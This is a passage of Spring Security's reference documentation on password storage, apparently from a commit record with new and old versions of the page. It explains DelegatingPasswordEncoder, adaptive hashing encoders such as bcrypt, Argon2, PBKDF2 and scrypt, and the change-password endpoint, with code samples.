SHA-256.\nWhen a user tried to authenticate, the hashed password would be compared to the hash of the password that they typed.\nThis meant that the system only needed to store the one way hash of the password.\nIf a breach occurred, then only the one way hashes of the passwords were exposed.\nSince the hashes were one way and it was computationally difficult to guess the passwords given the hash, it would not be worth the effort to figure out each password in the system.\nTo defeat this new system malicious users decided to create lookup tables known as https:\/\/en.wikipedia.org\/wiki\/Rainbow_table[Rainbow Tables].\nRather than doing the work of guessing each password every time, they computed the password once and stored it in a lookup table.\n\nTo mitigate the effectiveness of Rainbow Tables, developers were encouraged to use salted passwords.\nInstead of using just the password as input to the hash function, random bytes (known as salt) would be generated for every users' password.\nThe salt and the user's password would be ran through the hash function which produced a unique hash.\nThe salt would be stored alongside the user's password in clear text.\nThen when a user tried to authenticate, the hashed password would be compared to the hash of the stored salt and the password that they typed.\nThe unique salt meant that Rainbow Tables were no longer effective because the hash was different for every salt and password combination.\n\nIn modern times we realize that cryptographic hashes (like SHA-256) are no longer secure.\nThe reason is that with modern hardware we can perform billions of hash calculations a second.\nThis means that we can crack each password individually with ease.\n\nDevelopers are now encouraged to leverage adaptive one-way functions to store a password.\nValidation of passwords with adaptive one-way functions are intentionally resource (i.e. CPU, memory, etc) intensive.\nAn adaptive one-way function allows configuring a \"work factor\" which can grow as hardware gets better.\nIt is recommended that the \"work factor\" be tuned to take about 1 second to verify a password on your system.\nThis trade off is to make it difficult for attackers to crack the password, but not so costly it puts excessive burden on your own system.\nSpring Security has attempted to provide a good starting point for the \"work factor\", but users are encouraged to customize the \"work factor\" for their own system since the performance will vary drastically from system to system.\nExamples of adaptive one-way functions that should be used include <<authentication-password-storage-bcrypt,bcrypt>>, <<authentication-password-storage-pbkdf2,PBKDF2>>, <<authentication-password-storage-scrypt,scrypt>>, and <<authentication-password-storage-argon2,argon2>>.\n\nBecause adaptive one-way functions are intentionally resource intensive, validating a username and password for every request will degrade performance of an application significantly.\nThere is nothing Spring Security (or any other library) can do to speed up the validation of the password since security is gained by making the validation resource intensive.\nUsers are encouraged to exchange the long term credentials (i.e. username and password) for a short term credential (i.e. session, OAuth Token, etc).\nThe short term credential can be validated quickly without any loss in security.\n\n\n[[authentication-password-storage-dpe]]\n== DelegatingPasswordEncoder\n\nPrior to Spring Security 5.0 the default `PasswordEncoder` was `NoOpPasswordEncoder` which required plain text passwords.\nBased upon the <<authentication-password-storage-history,Password History>> section you might expect that the default `PasswordEncoder` is now something like `BCryptPasswordEncoder`.\nHowever, this ignores three real world problems:\n\n- There are many applications using old password encodings that cannot easily migrate\n- The best practice for password storage will change again\n- As a framework Spring Security cannot make breaking changes frequently\n\nInstead Spring Security introduces `DelegatingPasswordEncoder` which solves all of the problems by:\n\n- Ensuring that passwords are encoded using the current password storage recommendations\n- Allowing for validating passwords in modern and legacy formats\n- Allowing for upgrading the encoding in the future\n\nYou can easily construct an instance of `DelegatingPasswordEncoder` using `PasswordEncoderFactories`.\n\n.Create Default DelegatingPasswordEncoder\n====\n.Java\n[source,java,role=\"primary\"]\n----\nPasswordEncoder passwordEncoder =\n PasswordEncoderFactories.createDelegatingPasswordEncoder();\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nval passwordEncoder: PasswordEncoder = PasswordEncoderFactories.createDelegatingPasswordEncoder()\n----\n====\n\nAlternatively, you may create your own custom instance. For example:\n\n.Create Custom DelegatingPasswordEncoder\n====\n.Java\n[source,java,role=\"primary\"]\n----\nString idForEncode = \"bcrypt\";\nMap encoders = new HashMap<>();\nencoders.put(idForEncode, new BCryptPasswordEncoder());\nencoders.put(\"noop\", NoOpPasswordEncoder.getInstance());\nencoders.put(\"pbkdf2\", new Pbkdf2PasswordEncoder());\nencoders.put(\"scrypt\", new SCryptPasswordEncoder());\nencoders.put(\"sha256\", new StandardPasswordEncoder());\n\nPasswordEncoder passwordEncoder =\n new DelegatingPasswordEncoder(idForEncode, encoders);\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nval idForEncode = \"bcrypt\"\nval encoders: MutableMap<String, PasswordEncoder> = mutableMapOf()\nencoders[idForEncode] = BCryptPasswordEncoder()\nencoders[\"noop\"] = NoOpPasswordEncoder.getInstance()\nencoders[\"pbkdf2\"] = Pbkdf2PasswordEncoder()\nencoders[\"scrypt\"] = SCryptPasswordEncoder()\nencoders[\"sha256\"] = StandardPasswordEncoder()\n\nval passwordEncoder: PasswordEncoder = DelegatingPasswordEncoder(idForEncode, encoders)\n----\n====\n\n[[authentication-password-storage-dpe-format]]\n=== Password Storage Format\n\nThe general format for a password is:\n\n.DelegatingPasswordEncoder Storage Format\n====\n[source,text,attrs=\"-attributes\"]\n----\n{id}encodedPassword\n----\n====\n\nSuch that `id` is an identifier used to look up which `PasswordEncoder` should be used and `encodedPassword` is the original encoded password for the selected `PasswordEncoder`.\nThe `id` must be at the beginning of the password, start with `{` and end with `}`.\nIf the `id` cannot be found, the `id` will be null.\nFor example, the following might be a list of passwords encoded using different `id`.\nAll of the original passwords are \"password\".\n\n.DelegatingPasswordEncoder Encoded Passwords Example\n====\n[source,text,attrs=\"-attributes\"]\n----\n{bcrypt}$2a$10$dXJ3SW6G7P50lGmMkkmwe.20cQQubK3.HZWzG3YB1tlRy.fqvM\/BG \/\/ <1>\n{noop}password \/\/ <2>\n{pbkdf2}5d923b44a6d129f3ddf3e3c8d29412723dcbde72445e8ef6bf3b508fbf17fa4ed4d6b99ca763d8dc \/\/ <3>\n{scrypt}$e0801$8bWJaSu2IKSn9Z9kM+TPXfOc\/9bdYSrN1oD9qfVThWEwdRTnO7re7Ei+fUZRJ68k9lTyuTeUp4of4g24hHnazw==$OAOec05+bXxvuu\/1qZ6NUR+xQYvYv7BeL1QxwRpY5Pc= \/\/ <4>\n{sha256}97cde38028ad898ebc02e690819fa220e88c62e0699403e94fff291cfffaf8410849f27605abcbc0 \/\/ <5>\n----\n====\n\n<1> The first password would have a `PasswordEncoder` id of `bcrypt` and encodedPassword of `$2a$10$dXJ3SW6G7P50lGmMkkmwe.20cQQubK3.HZWzG3YB1tlRy.fqvM\/BG`.\nWhen matching it would delegate to `BCryptPasswordEncoder`\n<2> The second password would have a `PasswordEncoder` id of `noop` and encodedPassword of `password`.\nWhen matching it would delegate to `NoOpPasswordEncoder`\n<3> The third password would have a `PasswordEncoder` id of `pbkdf2` and encodedPassword of `5d923b44a6d129f3ddf3e3c8d29412723dcbde72445e8ef6bf3b508fbf17fa4ed4d6b99ca763d8dc`.\nWhen matching it would delegate to `Pbkdf2PasswordEncoder`\n<4> The fourth password would have a `PasswordEncoder` id of `scrypt` and encodedPassword of `$e0801$8bWJaSu2IKSn9Z9kM+TPXfOc\/9bdYSrN1oD9qfVThWEwdRTnO7re7Ei+fUZRJ68k9lTyuTeUp4of4g24hHnazw==$OAOec05+bXxvuu\/1qZ6NUR+xQYvYv7BeL1QxwRpY5Pc=`\nWhen matching it would delegate to `SCryptPasswordEncoder`\n<5> The final password would have a `PasswordEncoder` id of `sha256` and encodedPassword of `97cde38028ad898ebc02e690819fa220e88c62e0699403e94fff291cfffaf8410849f27605abcbc0`.\nWhen matching it would delegate to `StandardPasswordEncoder`\n\n[NOTE]\n====\nSome users might be concerned that the storage format is provided for a potential hacker.\nThis is not a concern because the storage of the password does not rely on the algorithm being a secret.\nAdditionally, most formats are easy for an attacker to figure out without the prefix.\nFor example, BCrypt passwords often start with `$2a$`.\n====\n\n[[authentication-password-storage-dpe-encoding]]\n=== Password Encoding\n\nThe `idForEncode` passed into the constructor determines which `PasswordEncoder` will be used for encoding passwords.\nIn the `DelegatingPasswordEncoder` we constructed above, that means that the result of encoding `password` would be delegated to `BCryptPasswordEncoder` and be prefixed with `+{bcrypt}+`.\nThe end result would look like:\n\n.DelegatingPasswordEncoder Encode Example\n====\n[source,text,attrs=\"-attributes\"]\n----\n{bcrypt}$2a$10$dXJ3SW6G7P50lGmMkkmwe.20cQQubK3.HZWzG3YB1tlRy.fqvM\/BG\n----\n====\n\n[[authentication-password-storage-dpe-matching]]\n=== Password Matching\n\nMatching is done based upon the `+{id}+` and the mapping of the `id` to the `PasswordEncoder` provided in the constructor.\nOur example in <<authentication-password-storage-dpe-format,Password Storage Format>> provides a working example of how this is done.\nBy default, the result of invoking `matches(CharSequence, String)` with a password and an `id` that is not mapped (including a null id) will result in an `IllegalArgumentException`.\nThis behavior can be customized using `DelegatingPasswordEncoder.setDefaultPasswordEncoderForMatches(PasswordEncoder)`.\n\nBy using the `id` we can match on any password encoding, but encode passwords using the most modern password encoding.\nThis is important, because unlike encryption, password hashes are designed so that there is no simple way to recover the plaintext.\nSince there is no way to recover the plaintext, it makes it difficult to migrate the passwords.\nWhile it is simple for users to migrate `NoOpPasswordEncoder`, we chose to include it by default to make it simple for the getting started experience.\n\n[[authentication-password-storage-dep-getting-started]]\n=== Getting Started Experience\n\nIf you are putting together a demo or a sample, it is a bit cumbersome to take time to hash the passwords of your users.\nThere are convenience mechanisms to make this easier, but this is still not intended for production.\n\n.withDefaultPasswordEncoder Example\n====\n.Java\n[source,java,role=\"primary\",attrs=\"-attributes\"]\n----\nUser user = User.withDefaultPasswordEncoder()\n .username(\"user\")\n .password(\"password\")\n .roles(\"user\")\n .build();\nSystem.out.println(user.getPassword());\n\/\/ {bcrypt}$2a$10$dXJ3SW6G7P50lGmMkkmwe.20cQQubK3.HZWzG3YB1tlRy.fqvM\/BG\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\",attrs=\"-attributes\"]\n----\nval user = User.withDefaultPasswordEncoder()\n .username(\"user\")\n .password(\"password\")\n .roles(\"user\")\n .build()\nprintln(user.password)\n\/\/ {bcrypt}$2a$10$dXJ3SW6G7P50lGmMkkmwe.20cQQubK3.HZWzG3YB1tlRy.fqvM\/BG\n----\n====\n\nIf you are creating multiple users, you can also reuse the builder.\n\n.withDefaultPasswordEncoder Reusing the Builder\n====\n.Java\n[source,java,role=\"primary\"]\n----\nUserBuilder users = User.withDefaultPasswordEncoder();\nUser user = users\n .username(\"user\")\n .password(\"password\")\n .roles(\"USER\")\n .build();\nUser admin = users\n .username(\"admin\")\n .password(\"password\")\n .roles(\"USER\",\"ADMIN\")\n .build();\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nval users = User.withDefaultPasswordEncoder()\nval user = users\n .username(\"user\")\n .password(\"password\")\n .roles(\"USER\")\n .build()\nval admin = users\n .username(\"admin\")\n .password(\"password\")\n .roles(\"USER\", \"ADMIN\")\n .build()\n----\n====\n\nThis does hash the password that is stored, but the passwords are still exposed in memory and in the compiled source code.\nTherefore, it is still not considered secure for a production environment.\nFor production, you should <<authentication-password-storage-boot-cli,hash your passwords externally>>.\n\n[[authentication-password-storage-boot-cli]]\n=== Encode with Spring Boot CLI\n\nThe easiest way to properly encode your password is to use the https:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/spring-boot-cli.html[Spring Boot CLI].\n\nFor example, the following will encode the password of `password` for use with <<authentication-password-storage-dpe>>:\n\n.Spring Boot CLI encodepassword Example\n====\n[source,attrs=\"-attributes\"]\n----\nspring encodepassword password\n{bcrypt}$2a$10$X5wFBtLrL\/kHcmrOGGTrGufsBX8CJ0WpQpF3pgeuxBB\/H73BK1DW6\n----\n====\n\n[[authentication-password-storage-dpe-troubleshoot]]\n=== Troubleshooting\n\nThe following error occurs when one of the passwords that are stored has no id as described in <<authentication-password-storage-dpe-format>>.\n\n----\njava.lang.IllegalArgumentException: There is no PasswordEncoder mapped for the id \"null\"\n\tat org.springframework.security.crypto.password.DelegatingPasswordEncoder$UnmappedIdPasswordEncoder.matches(DelegatingPasswordEncoder.java:233)\n\tat org.springframework.security.crypto.password.DelegatingPasswordEncoder.matches(DelegatingPasswordEncoder.java:196)\n----\n\nThe easiest way to resolve the error is to switch to explicitly providing the `PasswordEncoder` that your passwords are encoded with.\nThe easiest way to resolve it is to figure out how your passwords are currently being stored and explicitly provide the correct `PasswordEncoder`.\n\nIf you are migrating from Spring Security 4.2.x you can revert to the previous behavior by <<authentication-password-storage-configuration,exposing a `NoOpPasswordEncoder` bean>>.\n\nAlternatively, you can prefix all of your passwords with the correct id and continue to use `DelegatingPasswordEncoder`.\nFor example, if you are using BCrypt, you would migrate your password from something like:\n\n----\n$2a$10$dXJ3SW6G7P50lGmMkkmwe.20cQQubK3.HZWzG3YB1tlRy.fqvM\/BG\n----\n\nto\n\n\n[source,attrs=\"-attributes\"]\n----\n{bcrypt}$2a$10$dXJ3SW6G7P50lGmMkkmwe.20cQQubK3.HZWzG3YB1tlRy.fqvM\/BG\n----\n\nFor a complete listing of the mappings refer to the Javadoc on\nhttps:\/\/docs.spring.io\/spring-security\/site\/docs\/5.0.x\/api\/org\/springframework\/security\/crypto\/factory\/PasswordEncoderFactories.html[PasswordEncoderFactories].\n\n[[authentication-password-storage-bcrypt]]\n== BCryptPasswordEncoder\n\nThe `BCryptPasswordEncoder` implementation uses the widely supported https:\/\/en.wikipedia.org\/wiki\/Bcrypt[bcrypt] algorithm to hash the passwords.\nIn order to make it more resistent to password cracking, bcrypt is deliberately slow.\nLike other adaptive one-way functions, it should be tuned to take about 1 second to verify a password on your system.\nThe default implementation of `BCryptPasswordEncoder` uses strength 10 as mentioned in the Javadoc of https:\/\/docs.spring.io\/spring-security\/site\/docs\/current\/api\/org\/springframework\/security\/crypto\/bcrypt\/BCryptPasswordEncoder.html[BCryptPasswordEncoder]. You are encouraged to\ntune and test the strength parameter on your own system so that it takes roughly 1 second to verify a password.\n\n.BCryptPasswordEncoder\n====\n.Java\n[source,java,role=\"primary\"]\n----\n\/\/ Create an encoder with strength 16\nBCryptPasswordEncoder encoder = new BCryptPasswordEncoder(16);\nString result = encoder.encode(\"myPassword\");\nassertTrue(encoder.matches(\"myPassword\", result));\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n\/\/ Create an encoder with strength 16\nval encoder = BCryptPasswordEncoder(16)\nval result: String = encoder.encode(\"myPassword\")\nassertTrue(encoder.matches(\"myPassword\", result))\n----\n====\n\n[[authentication-password-storage-argon2]]\n== Argon2PasswordEncoder\n\nThe `Argon2PasswordEncoder` implementation uses the https:\/\/en.wikipedia.org\/wiki\/Argon2[Argon2] algorithm to hash the passwords.\nArgon2 is the winner of the https:\/\/en.wikipedia.org\/wiki\/Password_Hashing_Competition[Password Hashing Competition].\nIn order to defeat password cracking on custom hardware, Argon2 is a deliberately slow algorithm that requires large amounts of memory.\nLike other adaptive one-way functions, it should be tuned to take about 1 second to verify a password on your system.\nThe current implementation of the `Argon2PasswordEncoder` requires BouncyCastle.\n\n.Argon2PasswordEncoder\n====\n.Java\n[source,java,role=\"primary\"]\n----\n\/\/ Create an encoder with all the defaults\nArgon2PasswordEncoder encoder = new Argon2PasswordEncoder();\nString result = encoder.encode(\"myPassword\");\nassertTrue(encoder.matches(\"myPassword\", result));\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n\/\/ Create an encoder with all the defaults\nval encoder = Argon2PasswordEncoder()\nval result: String = encoder.encode(\"myPassword\")\nassertTrue(encoder.matches(\"myPassword\", result))\n----\n====\n\n[[authentication-password-storage-pbkdf2]]\n== Pbkdf2PasswordEncoder\n\nThe `Pbkdf2PasswordEncoder` implementation uses the https:\/\/en.wikipedia.org\/wiki\/PBKDF2[PBKDF2] algorithm to hash the passwords.\nIn order to defeat password cracking PBKDF2 is a deliberately slow algorithm.\nLike other adaptive one-way functions, it should be tuned to take about 1 second to verify a password on your system.\nThis algorithm is a good choice when FIPS certification is required.\n\n.Pbkdf2PasswordEncoder\n====\n.Java\n[source,java,role=\"primary\"]\n----\n\/\/ Create an encoder with all the defaults\nPbkdf2PasswordEncoder encoder = new Pbkdf2PasswordEncoder();\nString result = encoder.encode(\"myPassword\");\nassertTrue(encoder.matches(\"myPassword\", result));\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n\/\/ Create an encoder with all the defaults\nval encoder = Pbkdf2PasswordEncoder()\nval result: String = encoder.encode(\"myPassword\")\nassertTrue(encoder.matches(\"myPassword\", result))\n----\n====\n\n[[authentication-password-storage-scrypt]]\n== SCryptPasswordEncoder\n\nThe `SCryptPasswordEncoder` implementation uses https:\/\/en.wikipedia.org\/wiki\/Scrypt[scrypt] algorithm to hash the passwords.\nIn order to defeat password cracking on custom hardware scrypt is a deliberately slow algorithm that requires large amounts of memory.\nLike other adaptive one-way functions, it should be tuned to take about 1 second to verify a password on your system.\n\n.SCryptPasswordEncoder\n====\n.Java\n[source,java,role=\"primary\"]\n----\n\/\/ Create an encoder with all the defaults\nSCryptPasswordEncoder encoder = new SCryptPasswordEncoder();\nString result = encoder.encode(\"myPassword\");\nassertTrue(encoder.matches(\"myPassword\", result));\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n\/\/ Create an encoder with all the defaults\nval encoder = SCryptPasswordEncoder()\nval result: String = encoder.encode(\"myPassword\")\nassertTrue(encoder.matches(\"myPassword\", result))\n----\n====\n\n[[authentication-password-storage-other]]\n== Other PasswordEncoders\n\nThere are a significant number of other `PasswordEncoder` implementations that exist entirely for backward compatibility.\nThey are all deprecated to indicate that they are no longer considered secure.\nHowever, there are no plans to remove them since it is difficult to migrate existing legacy systems.\n\n[[authentication-password-storage-configuration]]\n== Password Storage Configuration\n\nSpring Security uses <<authentication-password-storage-dpe>> by default.\nHowever, this can be customized by exposing a `PasswordEncoder` as a Spring bean.\n\n\nIf you are migrating from Spring Security 4.2.x you can revert to the previous behavior by exposing a `NoOpPasswordEncoder` bean.\n\n[WARNING]\n====\nReverting to `NoOpPasswordEncoder` is not considered to be secure.\nYou should instead migrate to using `DelegatingPasswordEncoder` to support secure password encoding.\n====\n\n.NoOpPasswordEncoder\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@Bean\npublic static PasswordEncoder passwordEncoder() {\n return NoOpPasswordEncoder.getInstance();\n}\n----\n\n.XML\n[source,xml,role=\"secondary\"]\n----\n<b:bean id=\"passwordEncoder\"\n class=\"org.springframework.security.crypto.password.NoOpPasswordEncoder\" factory-method=\"getInstance\"\/>\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@Bean\nfun passwordEncoder(): PasswordEncoder {\n return NoOpPasswordEncoder.getInstance();\n}\n----\n====\n\n[NOTE]\n====\nXML Configuration requires the `NoOpPasswordEncoder` bean name to be `passwordEncoder`.\n====\n\n[[authentication-change-password-configuration]]\n== Change Password Configuration\n\nMost applications that allow a user to specify a password also require a feature for updating that password.\n\nhttps:\/\/w3c.github.io\/webappsec-change-password-url\/[A Well-Know URL for Changing Passwords] indicates a mechanism by which password managers can discover the password update endpoint for a given application.\n\nYou can configure Spring Security to provide this discovery endpoint.\nFor example, if the change password endpoint in your application is `\/change-password`, then you can configure Spring Security like so:\n\n.Default Change Password Endpoint\n====\n.Java\n[source,java,role=\"primary\"]\n----\nhttp\n .passwordManagement(Customizer.withDefaults())\n----\n\n.XML\n[source,xml,role=\"secondary\"]\n----\n<sec:password-management\/>\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nhttp {\n passwordManagement { }\n}\n----\n====\n\nThen, when a password manager navigates to `\/.well-known\/change-password` then Spring Security will redirect your endpoint, `\/change-password`.\n\nOr, if your endpoint is something other than `\/change-password`, you can also specify that like so:\n\n.Change Password Endpoint\n====\n.Java\n[source,java,role=\"primary\"]\n----\nhttp\n .passwordManagement((management) -> management\n .changePasswordPage(\"\/update-password\")\n )\n----\n\n.XML\n[source,xml,role=\"secondary\"]\n----\n<sec:password-management change-password-page=\"\/update-password\"\/>\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nhttp {\n passwordManagement {\n changePasswordPage = \"\/update-password\"\n }\n}\n----\n====\n\nWith the above configuration, when a password manager navigates to `\/.well-known\/change-password`, then Spring Security will redirect to `\/update-password`.\n","old_contents":"[[authentication-password-storage]]\n= Password Storage\n\nSpring Security's `PasswordEncoder` interface is used to perform a one way transformation of a password to allow the password to be stored securely.\nGiven `PasswordEncoder` is a one way transformation, it is not intended when the password transformation needs to be two way (i.e. storing credentials used to authenticate to a database).\nTypically `PasswordEncoder` is used for storing a password that needs to be compared to a user provided password at the time of authentication.\n\n[[authentication-password-storage-history]]\n== Password Storage History\n\nThroughout the years the standard mechanism for storing passwords has evolved.\nIn the beginning passwords were stored in plain text.\nThe passwords were assumed to be safe because the data store the passwords were saved in required credentials to access it.\nHowever, malicious users were able to find ways to get large \"data dumps\" of usernames and passwords using attacks like SQL Injection.\nAs more and more user credentials became public security experts realized we needed to do more to protect users' passwords.\n\nDevelopers were then encouraged to store passwords after running them through a one way hash such as SHA-256.\nWhen a user tried to authenticate, the hashed password would be compared to the hash of the password that they typed.\nThis meant that the system only needed to store the one way hash of the password.\nIf a breach occurred, then only the one way hashes of the passwords were exposed.\nSince the hashes were one way and it was computationally difficult to guess the passwords given the hash, it would not be worth the effort to figure out each password in the system.\nTo defeat this new system malicious users decided to create lookup tables known as https:\/\/en.wikipedia.org\/wiki\/Rainbow_table[Rainbow Tables].\nRather than doing the work of guessing each password every time, they computed the password once and stored it in a lookup table.\n\nTo mitigate the effectiveness of Rainbow Tables, developers were encouraged to use salted passwords.\nInstead of using just the password as input to the hash function, random bytes (known as salt) would be generated for every users' password.\nThe salt and the user's password would be ran through the hash function which produced a unique hash.\nThe salt would be stored alongside the user's password in clear text.\nThen when a user tried to authenticate, the hashed password would be compared to the hash of the stored salt and the password that they typed.\nThe unique salt meant that Rainbow Tables were no longer effective because the hash was different for every salt and password combination.\n\nIn modern times we realize that cryptographic hashes (like SHA-256) are no longer secure.\nThe reason is that with modern hardware we can perform billions of hash calculations a second.\nThis means that we can crack each password individually with ease.\n\nDevelopers are now encouraged to leverage adaptive one-way functions to store a password.\nValidation of passwords with adaptive one-way functions are intentionally resource (i.e. CPU, memory, etc) intensive.\nAn adaptive one-way function allows configuring a \"work factor\" which can grow as hardware gets better.\nIt is recommended that the \"work factor\" be tuned to take about 1 second to verify a password on your system.\nThis trade off is to make it difficult for attackers to crack the password, but not so costly it puts excessive burden on your own system.\nSpring Security has attempted to provide a good starting point for the \"work factor\", but users are encouraged to customize the \"work factor\" for their own system since the performance will vary drastically from system to system.\nExamples of adaptive one-way functions that should be used include <<authentication-password-storage-bcrypt,bcrypt>>, <<authentication-password-storage-pbkdf2,PBKDF2>>, <<authentication-password-storage-scrypt,scrypt>>, and <<authentication-password-storage-argon2,argon2>>.\n\nBecause adaptive one-way functions are intentionally resource intensive, validating a username and password for every request will degrade performance of an application significantly.\nThere is nothing Spring Security (or any other library) can do to speed up the validation of the password since security is gained by making the validation resource intensive.\nUsers are encouraged to exchange the long term credentials (i.e. username and password) for a short term credential (i.e. session, OAuth Token, etc).\nThe short term credential can be validated quickly without any loss in security.\n\n\n[[authentication-password-storage-dpe]]\n== DelegatingPasswordEncoder\n\nPrior to Spring Security 5.0 the default `PasswordEncoder` was `NoOpPasswordEncoder` which required plain text passwords.\nBased upon the <<authentication-password-storage-history,Password History>> section you might expect that the default `PasswordEncoder` is now something like `BCryptPasswordEncoder`.\nHowever, this ignores three real world problems:\n\n- There are many applications using old password encodings that cannot easily migrate\n- The best practice for password storage will change again\n- As a framework Spring Security cannot make breaking changes frequently\n\nInstead Spring Security introduces `DelegatingPasswordEncoder` which solves all of the problems by:\n\n- Ensuring that passwords are encoded using the current password storage recommendations\n- Allowing for validating passwords in modern and legacy formats\n- Allowing for upgrading the encoding in the future\n\nYou can easily construct an instance of `DelegatingPasswordEncoder` using `PasswordEncoderFactories`.\n\n.Create Default DelegatingPasswordEncoder\n====\n.Java\n[source,java,role=\"primary\"]\n----\nPasswordEncoder passwordEncoder =\n PasswordEncoderFactories.createDelegatingPasswordEncoder();\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nval passwordEncoder: PasswordEncoder = PasswordEncoderFactories.createDelegatingPasswordEncoder()\n----\n====\n\nAlternatively, you may create your own custom instance. For example:\n\n.Create Custom DelegatingPasswordEncoder\n====\n.Java\n[source,java,role=\"primary\"]\n----\nString idForEncode = \"bcrypt\";\nMap encoders = new HashMap<>();\nencoders.put(idForEncode, new BCryptPasswordEncoder());\nencoders.put(\"noop\", NoOpPasswordEncoder.getInstance());\nencoders.put(\"pbkdf2\", new Pbkdf2PasswordEncoder());\nencoders.put(\"scrypt\", new SCryptPasswordEncoder());\nencoders.put(\"sha256\", new StandardPasswordEncoder());\n\nPasswordEncoder passwordEncoder =\n new DelegatingPasswordEncoder(idForEncode, encoders);\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nval idForEncode = \"bcrypt\"\nval encoders: MutableMap<String, PasswordEncoder> = mutableMapOf()\nencoders[idForEncode] = BCryptPasswordEncoder()\nencoders[\"noop\"] = NoOpPasswordEncoder.getInstance()\nencoders[\"pbkdf2\"] = Pbkdf2PasswordEncoder()\nencoders[\"scrypt\"] = SCryptPasswordEncoder()\nencoders[\"sha256\"] = StandardPasswordEncoder()\n\nval passwordEncoder: PasswordEncoder = DelegatingPasswordEncoder(idForEncode, encoders)\n----\n====\n\n[[authentication-password-storage-dpe-format]]\n=== Password Storage Format\n\nThe general format for a password is:\n\n.DelegatingPasswordEncoder Storage Format\n====\n[source,text,attrs=\"-attributes\"]\n----\n{id}encodedPassword\n----\n====\n\nSuch that `id` is an identifier used to look up which `PasswordEncoder` should be used and `encodedPassword` is the original encoded password for the selected `PasswordEncoder`.\nThe `id` must be at the beginning of the password, start with `{` and end with `}`.\nIf the `id` cannot be found, the `id` will be null.\nFor example, the following might be a list of passwords encoded using different `id`.\nAll of the original passwords are \"password\".\n\n.DelegatingPasswordEncoder Encoded Passwords Example\n====\n[source,text,attrs=\"-attributes\"]\n----\n{bcrypt}$2a$10$dXJ3SW6G7P50lGmMkkmwe.20cQQubK3.HZWzG3YB1tlRy.fqvM\/BG \/\/ <1>\n{noop}password \/\/ <2>\n{pbkdf2}5d923b44a6d129f3ddf3e3c8d29412723dcbde72445e8ef6bf3b508fbf17fa4ed4d6b99ca763d8dc \/\/ <3>\n{scrypt}$e0801$8bWJaSu2IKSn9Z9kM+TPXfOc\/9bdYSrN1oD9qfVThWEwdRTnO7re7Ei+fUZRJ68k9lTyuTeUp4of4g24hHnazw==$OAOec05+bXxvuu\/1qZ6NUR+xQYvYv7BeL1QxwRpY5Pc= \/\/ <4>\n{sha256}97cde38028ad898ebc02e690819fa220e88c62e0699403e94fff291cfffaf8410849f27605abcbc0 \/\/ <5>\n----\n====\n\n<1> The first password would have a `PasswordEncoder` id of `bcrypt` and encodedPassword of `$2a$10$dXJ3SW6G7P50lGmMkkmwe.20cQQubK3.HZWzG3YB1tlRy.fqvM\/BG`.\nWhen matching it would delegate to `BCryptPasswordEncoder`\n<2> The second password would have a `PasswordEncoder` id of `noop` and encodedPassword of `password`.\nWhen matching it would delegate to `NoOpPasswordEncoder`\n<3> The third password would have a `PasswordEncoder` id of `pbkdf2` and encodedPassword of `5d923b44a6d129f3ddf3e3c8d29412723dcbde72445e8ef6bf3b508fbf17fa4ed4d6b99ca763d8dc`.\nWhen matching it would delegate to `Pbkdf2PasswordEncoder`\n<4> The fourth password would have a `PasswordEncoder` id of `scrypt` and encodedPassword of `$e0801$8bWJaSu2IKSn9Z9kM+TPXfOc\/9bdYSrN1oD9qfVThWEwdRTnO7re7Ei+fUZRJ68k9lTyuTeUp4of4g24hHnazw==$OAOec05+bXxvuu\/1qZ6NUR+xQYvYv7BeL1QxwRpY5Pc=`\nWhen matching it would delegate to `SCryptPasswordEncoder`\n<5> The final password would have a `PasswordEncoder` id of `sha256` and encodedPassword of `97cde38028ad898ebc02e690819fa220e88c62e0699403e94fff291cfffaf8410849f27605abcbc0`.\nWhen matching it would delegate to `StandardPasswordEncoder`\n\n[NOTE]\n====\nSome users might be concerned that the storage format is provided for a potential hacker.\nThis is not a concern because the storage of the password does not rely on the algorithm being a secret.\nAdditionally, most formats are easy for an attacker to figure out without the prefix.\nFor example, BCrypt passwords often start with `$2a$`.\n====\n\n[[authentication-password-storage-dpe-encoding]]\n=== Password Encoding\n\nThe `idForEncode` passed into the constructor determines which `PasswordEncoder` will be used for encoding passwords.\nIn the `DelegatingPasswordEncoder` we constructed above, that means that the result of encoding `password` would be delegated to `BCryptPasswordEncoder` and be prefixed with `+{bcrypt}+`.\nThe end result would look like:\n\n.DelegatingPasswordEncoder Encode Example\n====\n[source,text,attrs=\"-attributes\"]\n----\n{bcrypt}$2a$10$dXJ3SW6G7P50lGmMkkmwe.20cQQubK3.HZWzG3YB1tlRy.fqvM\/BG\n----\n====\n\n[[authentication-password-storage-dpe-matching]]\n=== Password Matching\n\nMatching is done based upon the `+{id}+` and the mapping of the `id` to the `PasswordEncoder` provided in the constructor.\nOur example in <<authentication-password-storage-dpe-format,Password Storage Format>> provides a working example of how this is done.\nBy default, the result of invoking `matches(CharSequence, String)` with a password and an `id` that is not mapped (including a null id) will result in an `IllegalArgumentException`.\nThis behavior can be customized using `DelegatingPasswordEncoder.setDefaultPasswordEncoderForMatches(PasswordEncoder)`.\n\nBy using the `id` we can match on any password encoding, but encode passwords using the most modern password encoding.\nThis is important, because unlike encryption, password hashes are designed so that there is no simple way to recover the plaintext.\nSince there is no way to recover the plaintext, it makes it difficult to migrate the passwords.\nWhile it is simple for users to migrate `NoOpPasswordEncoder`, we chose to include it by default to make it simple for the getting started experience.\n\n[[authentication-password-storage-dep-getting-started]]\n=== Getting Started Experience\n\nIf you are putting together a demo or a sample, it is a bit cumbersome to take time to hash the passwords of your users.\nThere are convenience mechanisms to make this easier, but this is still not intended for production.\n\n.withDefaultPasswordEncoder 